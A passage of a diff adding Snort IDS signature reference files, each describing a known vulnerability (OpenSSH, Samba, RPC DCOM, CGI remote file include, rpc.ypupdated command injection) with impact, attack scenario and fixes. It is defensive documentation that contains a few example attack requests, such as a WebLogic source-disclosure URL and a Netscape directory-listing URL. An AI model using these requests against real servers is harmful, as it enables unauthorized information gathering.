+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1386.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1386
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1812.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid: 1812
+
+--
+Summary:
+Secure Shell (SSH) is used to remotely manage systems over encrypted TCP
+sessions. This event is generated when an attempt is made to exploit 
+vulnerable versions of the SSH daemon.
+
+--
+Impact:
+System compromize presenting the attacker with either the opportunity to
+execute arbitrary code with the privileges of the user running the SSH daemon (usually root) or a possible Denial of Service (DoS).
+
+--
+Detailed Information:
+OpenSSH versions prior to 3.3 contain a flaw that could allow a remote attacker to compromise a vulnerable SSH daemon via an integer overflow on systems with BSD_AUTH or SKEY options compiled and PAM authentication or Challenge Response Authentication enabled.
+
+Affected Systems:
+	OpenSSH versions 2.9 to 3.2
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+Enable the privilege separation option in OpenSSH 3.3 if possible.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Securityfocus:
+http://www.securityfocus.com/bid/5093
+
+--
--- /dev/null
+++ b/doc/signatures/1534.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1534
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3465.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+3465
+
+--
+Summary:
+This event is generated when an attempt is made to access the cgi script
+show.pl.
+
+--
+Impact:
+Use of script as an open proxy.
+
+--
+Detailed Information:
+RiSearch is a collection of cgi scripts written in Perl to facilitate
+web site search functionality. Some versions of the script show.pl do
+not correctly sanitize user input. This may present an attacker with the
+opportunity to use the script as an open proxy server, possibly in
+attempts to execute web attacks against other systems anonymously.
+
+Specifically, it may be possible for an attacker to supply their own
+input to the "uri" parameter.
+
+--
+Affected Systems:
+	RiSearch 0.99.8 and prior
+	RiSearch Pro 3.2.6
+
+--
+Attack Scenarios:
+An attacker can supply a URI of their choosing as a value for the
+uri parameter
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3048.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3048
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3038.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3038
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1653.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1653
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If the webserver has pages or directories by the name of campus this rule will
+fire often.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+False positive information contributed by Colin Harford <colin.harford@ualberta.ca>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000706.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000706
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "SmartSiteCMS" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "root" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "root" parameter in the "index.php" script used by the "SmartSiteCMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SmartSiteCMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1186.txt
@@ -0,0 +1,75 @@
+Rule:  
+
+--
+Sid:
+1186
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+vulnerability in some versions of Netscape Enterprise Server.
+ 
+--
+Impact:
+Information leak which could provide an attacker with the data needed to
+launch further attacks or gain more detailed information about your web server.
+
+--
+Detailed Information:
+A user can see a directory listing by appending a Web Publishing command
+to the end of a directory URL, for example: "http://www.sun.com/?wp-ver-diff".
+
+This exploit will work on Netscape Enterprise Server regardless of
+directory indexing settings.  
+
+It will not work on iPlanet Web Server if directory indexing is set to
+"none" or "fancy" (the default). Web Publishing need not be enabled for
+this exploit to work.
+
+--
+Affected Systems:
+	Netscape Enterprise Server 3.0, 3.51 and 3.6
+
+-- 
+Attack Scenarios:
+The gathering of information such as directory listings is valuable when
+planning to attack a web server. 
+
+--
+Ease of Attack:
+Simple. No exploit software required however, an automated tool for
+scanning exists as does an exploit script.
+
+--
+False Positives:
+A web server that uses URLs which contain web publishing commands.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disable directory indexing. For earlier versions of Netscape Enterprise
+Server, this may not fix the problem. On iPlanet, you can also change
+the indexing type to "fancy".
+
+To fix the potential DOS vulnerability, upgrade to at least iWS 4.1 SP8.
+
+--
+Contributors:
+Snort documentation contributed by Kevin Peuhkurinen
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+iPlanet Knowledge Base Article 4302:
+http://knowledgebase.iplanet.com/ikb/kb/articles/4302.html 
+
+iPlanet Knowledge Base Article 7761:
+http://knowledgebase.iplanet.com/ikb/kb/articles/7761.html 
+
+--
--- /dev/null
+++ b/doc/signatures/1190.txt
@@ -0,0 +1,75 @@
+Rule:  
+
+--
+Sid:
+1190
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+vulnerability in some versions of Netscape Enterprise Server.
+ 
+--
+Impact:
+Information leak which could provide an attacker with the data needed to
+launch further attacks or gain more detailed information about your web server.
+
+--
+Detailed Information:
+A user can see a directory listing by appending a Web Publishing command
+to the end of a directory URL, for example: "http://www.sun.com/?wp-uncheckout".
+
+This exploit will work on Netscape Enterprise Server regardless of
+directory indexing settings.  
+
+It will not work on iPlanet Web Server if directory indexing is set to
+"none" or "fancy" (the default). Web Publishing need not be enabled for
+this exploit to work.
+
+--
+Affected Systems:
+	Netscape Enterprise Server 3.0, 3.51 and 3.6
+
+-- 
+Attack Scenarios:
+The gathering of information such as directory listings is valuable when
+planning to attack a web server. 
+
+--
+Ease of Attack:
+Simple. No exploit software required however, an automated tool for
+scanning exists as does an exploit script.
+
+--
+False Positives:
+A web server that uses URLs which contain web publishing commands.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disable directory indexing. For earlier versions of Netscape Enterprise
+Server, this may not fix the problem. On iPlanet, you can also change
+the indexing type to "fancy".
+
+To fix the potential DOS vulnerability, upgrade to at least iWS 4.1 SP8.
+
+--
+Contributors:
+Snort documentation contributed by Kevin Peuhkurinen
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+iPlanet Knowledge Base Article 4302:
+http://knowledgebase.iplanet.com/ikb/kb/articles/4302.html 
+
+iPlanet Knowledge Base Article 7761:
+http://knowledgebase.iplanet.com/ikb/kb/articles/7761.html 
+
+--
--- /dev/null
+++ b/doc/signatures/100000591.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000591
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "editor_delete.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"editor_delete.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2139.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 2139
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerabliity in BEA Systems WebLogic server. 
+
+--
+Impact:
+Information gathering, source code disclosure.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a vulnerabliity in BEA Systems WebLogic server.
+
+A weakness in the configuration of the WebLogic server from BEA Systems allows an attacker to view the source code of .jsp and .jhtml pages that reside in the root directory of the webserver. A request for these documents prefixed with /*.shtml/ will exploit a vulnerability in the handling of Server Side Include Servlet (SSIServlet) such that the webserver will return the documents unparsed, rendering the source code viewable.
+
+--
+Affected Systems:
+BEA Systems WebLogic Enterprise 5.1 and 5.1.x
+
+--
+Attack Scenarios:
+An attacker can retrieve the source code of a .jsp file by making a web request in the form: http://www.foo.com/*.shtml/target.jsp.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3227.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3227
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3304.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3304
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2088.txt
@@ -0,0 +1,87 @@
+Rule:
+
+--
+Sid:
+2088
+
+--
+Summary:
+vulnerability in the rcp service ypupdated.
+
+--
+Impact:
+Information disclosure and possible code execution.
+
+Unauthorized super user access to the vulnerable host resulting in a 
+compromise of all data on the host and any network resources that host 
+is connected to. Full control of the victim is gained.
+
+--
+Detailed Information:
+The ypupdated service is used in conjunction with NIS servers to 
+remotely update changes made in NIS databases.
+
+On recieving a request the yupdated service executes a make command 
+using the Bourne shell. It is possible to execute code using 
+metacharacters in the request.
+
+Commands and code after the metacharacters in the request will be 
+executed with the privileges of the super user on the vulnerable system.
+
+--
+Affected Systems:
+	HP-UX 10.1, 10.10 and 10.20
+	
+	IBM AIX 3.2 and 4.1
+	
+	NEC EWS-UX/V (Rel4.2MP), (Rel4.2)
+	NEC UP-UX/V (Rel4.2MP)
+	NEC UX/4800 (64)
+	
+	SGI IRIX 3.2, 3.3, 3.3.1, 3.3.2, 3.3.3
+	SGI IRIX 4.0, 4.0.1 T, 4.0.1,4.0.2, 4.0.3, 4.0.4 T, 4.0.4 B, 4.0.4, 4.0.5 IPR, 4.0.5 H, 4.0.5 G, 4.0.5 F, 4.0.5 E, 4.0.5 D, 4.0.5 A, 4.0.5 (IOP), 4.0.5
+	SGI IRIX 5.0, 5.0.1, 5.1, 5.1.1, 5.2, 5.3 XFS, 5.3
+	SGI IRIX 6.0, 6.0.1 XFS, 6.0.1
+	
+	Sun SunOS 4.1 PSR_A, 4.1, 4.1.1, 4.1.2, 4.1.3 c, 4.1.3 _U1, 4.1.3, 4.1.4 -JL, 4.1.4
+
+--
+Attack Scenarios:
+The attacker needs to craft a specially formulated request to the 
+rpc.ypupdated service containing a long username. An exploit for this 
+vulnerability exists.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply pacthes for the affected systems as soon as possible.
+
+Disable the rpc.ypupdated daemon.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1749
+
+--
--- /dev/null
+++ b/doc/signatures/1644.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1644
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1323.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid: 1323
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a format string vulnerability in the rwhois daemon from Network Solutions.
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to execute arbitrary code.
+
+--
+Detailed Information:
+Certain versions of rwhoisd from Network Solutions contain a programming error that allows an attacker to execute arbitrary code. The error is present when used with the Start of Authority (soa) file directive.
+
+Referral Whois (rwhois) is a directory service used to provide information on hosts and networks connected to the internet.
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0838
+
+Bugtraq:
+http://www.securityfocus.com/bid/3474
+
+--
--- /dev/null
+++ b/doc/signatures/2966.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2966
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/3307.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3307
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/459.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+459
+
+--
+
+Summary:
+This event is generated when an ICMP Type 1 datagram with an undefined ICMP Code is detected on the network. 
+
+--
+
+Impact:
+ICMP Type 1 datagrams are not currently used by any known devices.
+
+--
+
+Detailed Information:
+ICMP Type 1 is not defined for use and is not expected network activity.  Any ICMP datagram with an undefined ICMP Code should be investigated.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Ingress filtering should be utilized to block incoming ICMP Type 1 datagrams
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/2110.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+2110
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow condition in the Post Office Protocol (POP) command STAT.
+
+--
+Impact:
+Possible remote execution of arbitrary code leading to a remote root 
+compromise.
+
+--
+Detailed Information:
+A vulnerability exists such that an attacker may overflow a buffer by
+sending a line feed character to a POP server via the STAT command.
+
+--
+Attack Scenarios:
+Simple.
